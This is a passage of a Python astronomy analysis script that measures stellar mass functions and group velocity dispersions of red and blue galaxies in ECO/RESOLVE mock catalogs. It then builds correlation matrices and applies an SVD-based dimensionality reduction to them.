logmstar_arr = mock_pd.logmstar.values
#Measure SMF of mock using diff_smf function
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(logmstar_arr, volume, h1_bool=False)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'R'],
volume, h1_bool=False, colour_flag='R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'B'],
volume, h1_bool=False, colour_flag='B')
phi_arr_total.append(phi_total)
phi_arr_red.append(phi_red)
phi_arr_blue.append(phi_blue)
sig_red, sig_blue, cen_red_sig, cen_blue_sig = \
get_deltav_sigma_mocks_qmcolour(survey, mock_pd)
new_mean_stats_red, new_centers_red, new_mean_stats_blue, \
new_centers_blue = \
get_sigma_per_group_mocks_qmcolour(survey, mock_pd)
sig_arr_red.append(sig_red)
sig_arr_blue.append(sig_blue)
cen_arr_red.append(cen_red_sig)
cen_arr_blue.append(cen_blue_sig)
new_sig_arr_red.append(new_centers_red)
new_sig_arr_blue.append(new_centers_blue)
mean_cen_arr_red.append(new_mean_stats_red[0])
mean_cen_arr_blue.append(new_mean_stats_blue[0])
subset_counter += 1
phi_arr_total = np.array(phi_arr_total)
phi_arr_red = np.array(phi_arr_red)
phi_arr_blue = np.array(phi_arr_blue)
sig_arr_red = np.array(sig_arr_red)
sig_arr_blue = np.array(sig_arr_blue)
cen_arr_red = np.array(cen_arr_red)
cen_arr_blue = np.array(cen_arr_blue)
new_sig_arr_red = np.array(new_sig_arr_red)
new_sig_arr_blue = np.array(new_sig_arr_blue)
mean_cen_arr_red = np.array(mean_cen_arr_red)
mean_cen_arr_blue = np.array(mean_cen_arr_blue)
# phi_arr_colour = np.append(phi_arr_red, phi_arr_blue, axis = 0)
# Covariance matrix for total phi (all galaxies)
# cov_mat = np.cov(phi_arr_total, rowvar=False) # default norm is N-1
# err_total = np.sqrt(cov_mat.diagonal())
# cov_mat_red = np.cov(phi_arr_red, rowvar=False) # default norm is N-1
# err_red = np.sqrt(cov_mat_red.diagonal())
# colour_err_arr.append(err_red)
# cov_mat_blue = np.cov(phi_arr_blue, rowvar=False) # default norm is N-1
# err_blue = np.sqrt(cov_mat_blue.diagonal())
# colour_err_arr.append(err_blue)
# corr_mat_red = cov_mat_red / np.outer(err_red , err_red)
# corr_mat_inv_red = np.linalg.inv(corr_mat_red)
# colour_corr_mat_inv.append(corr_mat_inv_red)
# corr_mat_blue = cov_mat_blue / np.outer(err_blue , err_blue)
# corr_mat_inv_blue = np.linalg.inv(corr_mat_blue)
# colour_corr_mat_inv.append(corr_mat_inv_blue)
phi_red_0 = phi_arr_red[:,0]
phi_red_1 = phi_arr_red[:,1]
phi_red_2 = phi_arr_red[:,2]
phi_red_3 = phi_arr_red[:,3]
phi_red_4 = phi_arr_red[:,4]
phi_blue_0 = phi_arr_blue[:,0]
phi_blue_1 = phi_arr_blue[:,1]
phi_blue_2 = phi_arr_blue[:,2]
phi_blue_3 = phi_arr_blue[:,3]
phi_blue_4 = phi_arr_blue[:,4]
dv_red_0 = sig_arr_red[:,0]
dv_red_1 = sig_arr_red[:,1]
dv_red_2 = sig_arr_red[:,2]
dv_red_3 = sig_arr_red[:,3]
dv_red_4 = sig_arr_red[:,4]
dv_blue_0 = sig_arr_blue[:,0]
dv_blue_1 = sig_arr_blue[:,1]
dv_blue_2 = sig_arr_blue[:,2]
dv_blue_3 = sig_arr_blue[:,3]
dv_blue_4 = sig_arr_blue[:,4]
av_grpcen_red_0 = mean_cen_arr_red[:,0]
av_grpcen_red_1 = mean_cen_arr_red[:,1]
av_grpcen_red_2 = mean_cen_arr_red[:,2]
av_grpcen_red_3 = mean_cen_arr_red[:,3]
av_grpcen_red_4 = mean_cen_arr_red[:,4]
av_grpcen_blue_0 = mean_cen_arr_blue[:,0]
av_grpcen_blue_1 = mean_cen_arr_blue[:,1]
av_grpcen_blue_2 = mean_cen_arr_blue[:,2]
av_grpcen_blue_3 = mean_cen_arr_blue[:,3]
av_grpcen_blue_4 = mean_cen_arr_blue[:,4]
combined_df = pd.DataFrame({'phi_red_0':phi_red_0, 'phi_red_1':phi_red_1,\
'phi_red_2':phi_red_2, 'phi_red_3':phi_red_3, 'phi_red_4':phi_red_4, \
'phi_blue_0':phi_blue_0, 'phi_blue_1':phi_blue_1,
'phi_blue_2':phi_blue_2, 'phi_blue_3':phi_blue_3,
'phi_blue_4':phi_blue_4, \
'dv_red_0':dv_red_0, 'dv_red_1':dv_red_1, 'dv_red_2':dv_red_2, \
'dv_red_3':dv_red_3, 'dv_red_4':dv_red_4, \
'dv_blue_0':dv_blue_0, 'dv_blue_1':dv_blue_1, 'dv_blue_2':dv_blue_2, \
'dv_blue_3':dv_blue_3, 'dv_blue_4':dv_blue_4, \
'av_grpcen_red_0':av_grpcen_red_0, 'av_grpcen_red_1':av_grpcen_red_1, \
'av_grpcen_red_2':av_grpcen_red_2, 'av_grpcen_red_3':av_grpcen_red_3, \
'av_grpcen_red_4':av_grpcen_red_4, 'av_grpcen_blue_0':av_grpcen_blue_0,\
'av_grpcen_blue_1':av_grpcen_blue_1, 'av_grpcen_blue_2':av_grpcen_blue_2, \
'av_grpcen_blue_3':av_grpcen_blue_3, 'av_grpcen_blue_4':av_grpcen_blue_4 })
# deltav_sig_colour = np.append(deltav_sig_red, deltav_sig_blue, axis = 0)
# cov_mat_colour = np.cov(phi_arr_colour,deltav_sig_colour, rowvar=False)
# err_colour = np.sqrt(cov_mat_colour.diagonal())
# corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
# corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
# cov_mat_colour = np.cov(phi_arr_red,phi_arr_blue, rowvar=False)
# err_colour = np.sqrt(cov_mat_colour.diagonal())
# corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
# corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
return combined_df
def get_err_data(survey, path):
"""
Calculate error in data SMF from mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
err_total: array
Standard deviation of phi values between all mocks and for all galaxies
err_red: array
Standard deviation of phi values between all mocks and for red galaxies
err_blue: array
Standard deviation of phi values between all mocks and for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
phi_arr_total = []
phi_arr_red = []
phi_arr_blue = []
sig_arr_red = []
sig_arr_blue = []
cen_arr_red = []
cen_arr_blue = []
mean_cen_arr_red = []
mean_cen_arr_blue = []
new_sig_arr_red = []
new_sig_arr_blue = []
box_id_arr = np.linspace(5001,5008,8)
for box in box_id_arr:
box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf i.e excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & (mock_pd.M_r.values <= mag_limit) &\
(mock_pd.logmstar.values >= mstar_limit)]
# ## Using best-fit found for old ECO data using optimize_hybridqm_eco,py
# Mstar_q = 10.39 # Msun/h
# Mh_q = 14.85 # Msun/h
# mu = 0.65
# nu = 0.16
## Using best-fit found for new ECO data using optimize_qm_eco.py
## for hybrid quenching model
Mstar_q = 10.49 # Msun/h
Mh_q = 14.03 # Msun/h
mu = 0.69
nu = 0.148
## Using best-fit found for new ECO data using optimize_qm_eco.py
## for halo quenching model
Mh_qc = 12.61 # Msun/h
Mh_qs = 13.5 # Msun/h
mu_c = 0.40
mu_s = 0.148
if quenching == 'hybrid':
theta = [Mstar_q, Mh_q, mu, nu]
f_red_c, f_red_s = hybrid_quenching_model(theta, mock_pd, 'nonvishnu')
elif quenching == 'halo':
theta = [Mh_qc, Mh_qs, mu_c, mu_s]
f_red_c, f_red_s = hybrid_quenching_model(theta, mock_pd, 'nonvishnu')
mock_pd = assign_colour_label_mock(f_red_c, f_red_s, mock_pd)
# logmstar_red_max = mock_pd.logmstar.loc[mock_pd.colour_label == 'R'].max()
# logmstar_red_max_arr.append(logmstar_red_max)
# logmstar_blue_max = mock_pd.logmstar.loc[mock_pd.colour_label == 'B'].max()
# logmstar_blue_max_arr.append(logmstar_blue_max)
logmstar_arr = mock_pd.logmstar.values
#Measure SMF of mock using diff_smf function
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(logmstar_arr, volume, h1_bool=False)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'R'],
volume, h1_bool=False, colour_flag='R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'B'],
volume, h1_bool=False, colour_flag='B')
phi_arr_total.append(phi_total)
phi_arr_red.append(phi_red)
phi_arr_blue.append(phi_blue)
sig_red, sig_blue, cen_red_sig, cen_blue_sig = \
get_deltav_sigma_mocks_qmcolour(survey, mock_pd)
new_mean_stats_red, new_centers_red, new_mean_stats_blue, \
new_centers_blue = \
get_sigma_per_group_mocks_qmcolour(survey, mock_pd)
sig_arr_red.append(sig_red)
sig_arr_blue.append(sig_blue)
cen_arr_red.append(cen_red_sig)
cen_arr_blue.append(cen_blue_sig)
new_sig_arr_red.append(new_centers_red)
new_sig_arr_blue.append(new_centers_blue)
mean_cen_arr_red.append(new_mean_stats_red[0])
mean_cen_arr_blue.append(new_mean_stats_blue[0])
phi_arr_total = np.array(phi_arr_total)
phi_arr_red = np.array(phi_arr_red)
phi_arr_blue = np.array(phi_arr_blue)
sig_arr_red = np.array(sig_arr_red)
sig_arr_blue = np.array(sig_arr_blue)
cen_arr_red = np.array(cen_arr_red)
cen_arr_blue = np.array(cen_arr_blue)
new_sig_arr_red = np.array(new_sig_arr_red)
new_sig_arr_blue = np.array(new_sig_arr_blue)
mean_cen_arr_red = np.array(mean_cen_arr_red)
mean_cen_arr_blue = np.array(mean_cen_arr_blue)
# phi_arr_colour = np.append(phi_arr_red, phi_arr_blue, axis = 0)
# Covariance matrix for total phi (all galaxies)
# cov_mat = np.cov(phi_arr_total, rowvar=False) # default norm is N-1
# err_total = np.sqrt(cov_mat.diagonal())
# cov_mat_red = np.cov(phi_arr_red, rowvar=False) # default norm is N-1
# err_red = np.sqrt(cov_mat_red.diagonal())
# colour_err_arr.append(err_red)
# cov_mat_blue = np.cov(phi_arr_blue, rowvar=False) # default norm is N-1
# err_blue = np.sqrt(cov_mat_blue.diagonal())
# colour_err_arr.append(err_blue)
# corr_mat_red = cov_mat_red / np.outer(err_red , err_red)
# corr_mat_inv_red = np.linalg.inv(corr_mat_red)
# colour_corr_mat_inv.append(corr_mat_inv_red)
# corr_mat_blue = cov_mat_blue / np.outer(err_blue , err_blue)
# corr_mat_inv_blue = np.linalg.inv(corr_mat_blue)
# colour_corr_mat_inv.append(corr_mat_inv_blue)
phi_red_0 = phi_arr_red[:,0]
phi_red_1 = phi_arr_red[:,1]
phi_red_2 = phi_arr_red[:,2]
phi_red_3 = phi_arr_red[:,3]
phi_red_4 = phi_arr_red[:,4]
phi_blue_0 = phi_arr_blue[:,0]
phi_blue_1 = phi_arr_blue[:,1]
phi_blue_2 = phi_arr_blue[:,2]
phi_blue_3 = phi_arr_blue[:,3]
phi_blue_4 = phi_arr_blue[:,4]
dv_red_0 = sig_arr_red[:,0]
dv_red_1 = sig_arr_red[:,1]
dv_red_2 = sig_arr_red[:,2]
dv_red_3 = sig_arr_red[:,3]
dv_red_4 = sig_arr_red[:,4]
dv_blue_0 = sig_arr_blue[:,0]
dv_blue_1 = sig_arr_blue[:,1]
dv_blue_2 = sig_arr_blue[:,2]
dv_blue_3 = sig_arr_blue[:,3]
dv_blue_4 = sig_arr_blue[:,4]
av_grpcen_red_0 = mean_cen_arr_red[:,0]
av_grpcen_red_1 = mean_cen_arr_red[:,1]
av_grpcen_red_2 = mean_cen_arr_red[:,2]
av_grpcen_red_3 = mean_cen_arr_red[:,3]
av_grpcen_red_4 = mean_cen_arr_red[:,4]
av_grpcen_blue_0 = mean_cen_arr_blue[:,0]
av_grpcen_blue_1 = mean_cen_arr_blue[:,1]
av_grpcen_blue_2 = mean_cen_arr_blue[:,2]
av_grpcen_blue_3 = mean_cen_arr_blue[:,3]
av_grpcen_blue_4 = mean_cen_arr_blue[:,4]
combined_df = pd.DataFrame({'phi_red_0':phi_red_0, 'phi_red_1':phi_red_1,\
'phi_red_2':phi_red_2, 'phi_red_3':phi_red_3, 'phi_red_4':phi_red_4, \
'phi_blue_0':phi_blue_0, 'phi_blue_1':phi_blue_1,
'phi_blue_2':phi_blue_2, 'phi_blue_3':phi_blue_3,
'phi_blue_4':phi_blue_4, \
'dv_red_0':dv_red_0, 'dv_red_1':dv_red_1, 'dv_red_2':dv_red_2, \
'dv_red_3':dv_red_3, 'dv_red_4':dv_red_4, \
'dv_blue_0':dv_blue_0, 'dv_blue_1':dv_blue_1, 'dv_blue_2':dv_blue_2, \
'dv_blue_3':dv_blue_3, 'dv_blue_4':dv_blue_4, \
'av_grpcen_red_0':av_grpcen_red_0, 'av_grpcen_red_1':av_grpcen_red_1, \
'av_grpcen_red_2':av_grpcen_red_2, 'av_grpcen_red_3':av_grpcen_red_3, \
'av_grpcen_red_4':av_grpcen_red_4, 'av_grpcen_blue_0':av_grpcen_blue_0,\
'av_grpcen_blue_1':av_grpcen_blue_1, 'av_grpcen_blue_2':av_grpcen_blue_2, \
'av_grpcen_blue_3':av_grpcen_blue_3, 'av_grpcen_blue_4':av_grpcen_blue_4 })
# deltav_sig_colour = np.append(deltav_sig_red, deltav_sig_blue, axis = 0)
# cov_mat_colour = np.cov(phi_arr_colour,deltav_sig_colour, rowvar=False)
# err_colour = np.sqrt(cov_mat_colour.diagonal())
# corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
# corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
# cov_mat_colour = np.cov(phi_arr_red,phi_arr_blue, rowvar=False)
# err_colour = np.sqrt(cov_mat_colour.diagonal())
# corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
# corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
return combined_df
def measure_all_smf(table, volume, data_bool, randint_logmstar=None):
"""
Calculates differential stellar mass function for all, red and blue galaxies
from mock/data
Parameters
----------
table: pandas Dataframe
Dataframe of either mock or data
volume: float
Volume of simulation/survey
cvar: float
Cosmic variance error
data_bool: Boolean
Data or mock
Returns
---------
3 multidimensional arrays of stellar mass, phi, total error in SMF and
counts per bin for all, red and blue galaxies
"""
colour_col = 'colour_label'
if data_bool:
logmstar_col = 'logmstar'
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(table[logmstar_col], volume, h1_bool=False)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(table[logmstar_col].loc[table[colour_col] == 'R'],
volume, h1_bool=False, colour_flag='R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(table[logmstar_col].loc[table[colour_col] == 'B'],
volume, h1_bool=False, colour_flag='B')
else:
# logmstar_col = 'stellar_mass'
logmstar_col = '{0}'.format(randint_logmstar)
## Changed to 10**X because Behroozi mocks now have M* values in log
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(10**(table[logmstar_col]), volume, h1_bool=True)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(10**(table[logmstar_col].loc[table[colour_col] == 'R']),
volume,h1_bool=True, colour_flag='R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(10**(table[logmstar_col].loc[table[colour_col] == 'B']),
volume, h1_bool=True, colour_flag='B')
return [max_total, phi_total, err_total, counts_total] , \
[max_red, phi_red, err_red, counts_red] , \
[max_blue, phi_blue, err_blue, counts_blue]
global model_init
global survey
global path_to_proc
global mf_type
global quenching
survey = 'eco'
machine = 'mac'
mf_type = 'smf'
quenching = 'hybrid'
dict_of_paths = cwpaths.cookiecutter_paths()
path_to_raw = dict_of_paths['raw_dir']
path_to_proc = dict_of_paths['proc_dir']
path_to_external = dict_of_paths['ext_dir']
path_to_data = dict_of_paths['data_dir']
if machine == 'bender':
halo_catalog = '/home/asadm2/.astropy/cache/halotools/halo_catalogs/'\
'vishnu/rockstar/vishnu_rockstar_test.hdf5'
elif machine == 'mac':
halo_catalog = path_to_raw + 'vishnu_rockstar_test.hdf5'
if survey == 'eco':
catl_file = path_to_proc + "gal_group_eco_data.hdf5"
elif survey == 'resolvea' or survey == 'resolveb':
catl_file = path_to_raw + "resolve/RESOLVE_liveJune2018.csv"
if survey == 'eco':
path_to_mocks = path_to_data + 'mocks/m200b/eco/'
elif survey == 'resolvea':
path_to_mocks = path_to_data + 'mocks/m200b/resolvea/'
elif survey == 'resolveb':
path_to_mocks = path_to_data + 'mocks/m200b/resolveb/'
catl, volume, z_median = read_data_catl(catl_file, survey)
catl = assign_colour_label_data(catl)
std_red_mocks, std_blue_mocks, centers_red_mocks, \
centers_blue_mocks = get_deltav_sigma_mocks_urcolour(survey, path_to_mocks)
std_red_mocks2, std_blue_mocks2, centers_red_mocks2, \
centers_blue_mocks2 = get_deltav_sigma_mocks_qmcolour_mod(survey, path_to_mocks)
std_red_data, centers_red_data, std_blue_data, centers_blue_data = \
get_deltav_sigma_data(catl)
phi_red_arr, phi_blue_arr = get_err_smf_mocks(survey, path_to_mocks)
corr_mat_combined_bool = True
if corr_mat_combined_bool:
phi_red_0 = phi_red_arr[:,0]
phi_red_1 = phi_red_arr[:,1]
phi_red_2 = phi_red_arr[:,2]
phi_red_3 = phi_red_arr[:,3]
phi_red_4 = phi_red_arr[:,4]
phi_blue_0 = phi_blue_arr[:,0]
phi_blue_1 = phi_blue_arr[:,1]
phi_blue_2 = phi_blue_arr[:,2]
phi_blue_3 = phi_blue_arr[:,3]
phi_blue_4 = phi_blue_arr[:,4]
dv_red_0 = std_red_mocks2[:,0]
dv_red_1 = std_red_mocks2[:,1]
dv_red_2 = std_red_mocks2[:,2]
dv_red_3 = std_red_mocks2[:,3]
dv_red_4 = std_red_mocks2[:,4]
dv_blue_0 = std_blue_mocks2[:,0]
dv_blue_1 = std_blue_mocks2[:,1]
dv_blue_2 = std_blue_mocks2[:,2]
dv_blue_3 = std_blue_mocks2[:,3]
dv_blue_4 = std_blue_mocks2[:,4]
combined_df = pd.DataFrame({'phi_red_0':phi_red_0, 'phi_red_1':phi_red_1,\
'phi_red_2':phi_red_2, 'phi_red_3':phi_red_3, 'phi_red_4':phi_red_4, \
'phi_blue_0':phi_blue_0, 'phi_blue_1':phi_blue_1,
'phi_blue_2':phi_blue_2, 'phi_blue_3':phi_blue_3,
'phi_blue_4':phi_blue_4, \
'dv_red_0':dv_red_0, 'dv_red_1':dv_red_1, 'dv_red_2':dv_red_2, \
'dv_red_3':dv_red_3, 'dv_red_4':dv_red_4, \
'dv_blue_0':dv_blue_0, 'dv_blue_1':dv_blue_1, 'dv_blue_2':dv_blue_2, \
'dv_blue_3':dv_blue_3, 'dv_blue_4':dv_blue_4})
# Correlation matrix of phi and deltav colour measurements combined
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(combined_df.corr(), cmap=cmap)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Combined \boldmath{$\Phi$} and \boldmath{$\sigma$} measurements using ZuMand15 colours')
plt.show()
if corr_mat_combined_bool:
phi_red_0 = phi_red_arr[:,0]
phi_red_1 = phi_red_arr[:,1]
phi_red_2 = phi_red_arr[:,2]
phi_red_3 = phi_red_arr[:,3]
phi_red_4 = phi_red_arr[:,4]
phi_blue_0 = phi_blue_arr[:,0]
phi_blue_1 = phi_blue_arr[:,1]
phi_blue_2 = phi_blue_arr[:,2]
phi_blue_3 = phi_blue_arr[:,3]
phi_blue_4 = phi_blue_arr[:,4]
dv_red_0 = std_red_mocks[:,0]
dv_red_1 = std_red_mocks[:,1]
dv_red_2 = std_red_mocks[:,2]
dv_red_3 = std_red_mocks[:,3]
dv_red_4 = std_red_mocks[:,4]
dv_blue_0 = std_blue_mocks[:,0]
dv_blue_1 = std_blue_mocks[:,1]
dv_blue_2 = std_blue_mocks[:,2]
dv_blue_3 = std_blue_mocks[:,3]
dv_blue_4 = std_blue_mocks[:,4]
combined_df = pd.DataFrame({'phi_red_0':phi_red_0, 'phi_red_1':phi_red_1,\
'phi_red_2':phi_red_2, 'phi_red_3':phi_red_3, 'phi_red_4':phi_red_4, \
'phi_blue_0':phi_blue_0, 'phi_blue_1':phi_blue_1,
'phi_blue_2':phi_blue_2, 'phi_blue_3':phi_blue_3,
'phi_blue_4':phi_blue_4, \
'dv_red_0':dv_red_0, 'dv_red_1':dv_red_1, 'dv_red_2':dv_red_2, \
'dv_red_3':dv_red_3, 'dv_red_4':dv_red_4, \
'dv_blue_0':dv_blue_0, 'dv_blue_1':dv_blue_1, 'dv_blue_2':dv_blue_2, \
'dv_blue_3':dv_blue_3, 'dv_blue_4':dv_blue_4})
# Correlation matrix of phi and deltav colour measurements combined
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(combined_df.corr(), cmap=cmap)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Combined \boldmath{$\Phi$} and \boldmath{$\sigma$} measurements')
plt.show()
else:
cov_mat_colour = np.cov(std_red_mocks, std_blue_mocks,
rowvar=False)
err_colour = np.sqrt(cov_mat_colour.diagonal())
corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
# Correlation matrix of just deltav measurements combined
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(corr_mat_colour, cmap=cmap)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Combined \boldmath{$\delta$}v measurements')
plt.show()
# Plot of spread in velocity dispersion of red and blue galaxies from data and
# mocks
fig2 = plt.figure()
for idx in range(len(centers_red_mocks)):
plt.scatter(centers_red_mocks[idx], std_red_mocks[idx],
c='indianred', s=80)
plt.scatter(centers_blue_mocks[idx], std_blue_mocks[idx],
c='cornflowerblue', s=80)
plt.scatter(centers_red_data, std_red_data, marker='*', c='darkred', s=80)
plt.scatter(centers_blue_data, std_blue_data, marker='*', c='darkblue', s=80)
plt.xlabel(r'$\mathbf{log\ M_{*,cen}}\ [\mathbf{M_{\odot}}]$', labelpad=15,
fontsize=25)
plt.ylabel(r'\boldmath$\sigma \left[km/s\right]$', labelpad=15,
fontsize=25)
plt.title(r'mocks vs. data $\sigma$')
plt.show()
## Histogram of red and blue sigma in bins of central stellar mass to see if the
## distribution of values to take std of is normal or lognormal
nrows = 2
ncols = 5
if survey == 'eco' or survey == 'resolvea':
red_stellar_mass_bins = np.linspace(8.6,11.5,6)
blue_stellar_mass_bins = np.linspace(8.6,10.5,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
fig3, axs = plt.subplots(nrows, ncols)
for i in range(0, nrows, 1):
for j in range(0, ncols, 1):
if i == 0: # row 1 for all red bins
axs[i, j].hist(np.log10(std_red_mocks.T[j]), histtype='step', \
color='indianred', linewidth=4, linestyle='-') # first red bin
axs[i, j].set_title('[{0}-{1}]'.format(np.round(
red_stellar_mass_bins[j],2), np.round(
red_stellar_mass_bins[j+1],2)), fontsize=20)
k2, p = nt(np.log10(std_red_mocks.T[j]), nan_policy="omit")
axs[i, j].text(0.7, 0.7, "{0}".format(np.round(p, 2)),
transform=axs[i, j].transAxes)
else: # row 2 for all blue bins
axs[i, j].hist(np.log10(std_blue_mocks.T[j]), histtype='step', \
color='cornflowerblue', linewidth=4, linestyle='-')
axs[i, j].set_title('[{0}-{1}]'.format(np.round(
blue_stellar_mass_bins[j],2), np.round(
blue_stellar_mass_bins[j+1],2)), fontsize=20)
k2, p = nt(np.log10(std_blue_mocks.T[j]), nan_policy="omit")
axs[i, j].text(0.7, 0.7, "{0}".format(np.round(p, 2)),
transform=axs[i, j].transAxes)
for ax in axs.flat:
ax.set(xlabel=r'\boldmath$\sigma \left[km/s\right]$')
for ax in axs.flat:
ax.label_outer()
plt.show()
p_red_arr = []
p_blue_arr = []
for idx in range(len(std_red_mocks.T)):
k2, p = nt(np.log10(std_red_mocks.T[idx]), nan_policy="omit")
p_red_arr.append(p)
for idx in range(len(std_blue_mocks.T)):
k2, p = nt(np.log10(std_blue_mocks.T[idx]), nan_policy="omit")
p_blue_arr.append(p)
# * resolve B - neither log or linear passed null hypothesis of normal dist.
# * eco - log passed null hypothesis
################################################################################
### Randomly sample a subset from 64 mocks and measure corr matrix ###
for idx in range(5):
print(idx)
combined_df = get_err_data_mod(survey, path_to_mocks)
# Correlation matrix of phi and deltav colour measurements combined
corr_mat_colour = combined_df.corr()
corr_mat_inv_colour = np.linalg.inv(corr_mat_colour.values)
err_colour = np.sqrt(np.diag(combined_df.cov()))
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(combined_df.corr(), cmap=cmap)
# tick_marks = [i for i in range(len(corr_mat_colour.columns))]
# plt.xticks(tick_marks, corr_mat_colour.columns, rotation='vertical')
# plt.yticks(tick_marks, corr_mat_colour.columns)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Mass function and old and new sigma observable')
plt.savefig('sample_{0}.png'.format(idx+1))
### Testing singular value decomposition ###
from scipy import linalg
num_mocks = 64
used_combined_df = get_err_data(survey, path_to_mocks)
used_corr_mat_colour = used_combined_df.corr()
used_err_colour = np.sqrt(np.diag(used_combined_df.cov()))
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(used_corr_mat_colour, cmap=cmap, vmin=-1, vmax=1)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Original matrix')
plt.show()
## Help from http://www.math.usm.edu/lambers/cos702/cos702_files/docs/PCA.pdf
## Help from https://stats.stackexchange.com/questions/134282/relationship-between-svd-and-pca-how-to-use-svd-to-perform-pca
U, s, Vh = linalg.svd(used_corr_mat_colour) # columns of U are the eigenvectors
eigenvalue_threshold = np.sqrt(np.sqrt(2/num_mocks))
idxs_cut = []
for idx,eigenval in enumerate(s):
if eigenval < eigenvalue_threshold:
idxs_cut.append(idx)
last_idx_to_keep = min(idxs_cut)-1
reconst = np.matrix(U[:, :last_idx_to_keep]) * np.diag(s[:last_idx_to_keep]) * \
np.matrix(Vh[:last_idx_to_keep, :])
fig2 = plt.figure()
ax1 = fig2.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(reconst, cmap=cmap, vmin=-1, vmax=1)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig2.colorbar(cax)
plt.title(r'Reconstructed matrix post-SVD')
plt.show()
fig3 = plt.figure()
plt.scatter(np.linspace(1,len(s),len(s)), s, s=120, marker='o',
facecolors='none', edgecolors='mediumorchid', linewidths=3)
plt.plot(np.linspace(1,len(s),len(s)), s, '-k')
plt.hlines(eigenvalue_threshold, 0, 30, ls='--')
plt.xlabel('Component number')
plt.ylabel('Eigenvalue')
plt.show()
## Projecting data onto new orthogonal space
print('Measuring SMF for data')
total_data, red_data, blue_data = measure_all_smf(catl, volume, \
data_bool=True)
print('Measuring spread in vel disp for data')
std_red, old_centers_red, std_blue, old_centers_blue = get_deltav_sigma_data(catl)
print('Measuring binned spread in vel disp for data')
mean_grp_cen_red, new_centers_red, mean_grp_cen_blue, new_centers_blue = \
get_sigma_per_group_data(catl)
full_data_arr = []
full_data_arr = np.insert(full_data_arr, 0, red_data[1])
full_data_arr = np.insert(full_data_arr, len(full_data_arr), blue_data[1])
full_data_arr = np.insert(full_data_arr, len(full_data_arr), std_red)
full_data_arr = np.insert(full_data_arr, len(full_data_arr), std_blue)
full_data_arr = np.insert(full_data_arr, len(full_data_arr), mean_grp_cen_red[0])
full_data_arr = np.insert(full_data_arr, len(full_data_arr), mean_grp_cen_blue[0])
full_data_arr = full_data_arr.reshape(1,30) #N,n - N:# of data , n:# of dims
eigenvector_subset = np.matrix(U[:, :last_idx_to_keep])
full_data_arr_new_space = full_data_arr @ eigenvector_subset
## Projecting simga (error from mocks) onto new orthogonal space
mock_data_df_new_space = pd.DataFrame(used_combined_df @ eigenvector_subset)
err_colour_new_space = np.sqrt(np.diag(mock_data_df_new_space.cov()))
## Plotting post-svd reduced correlation and covariance matrices
corr_mat_colour_new_space = mock_data_df_new_space.corr()
cov_mat_colour_new_space = mock_data_df_new_space.cov()
fig4 = plt.figure()
ax1 = fig4.add_subplot(111)
cmap = cm.get_cmap('Spectral')
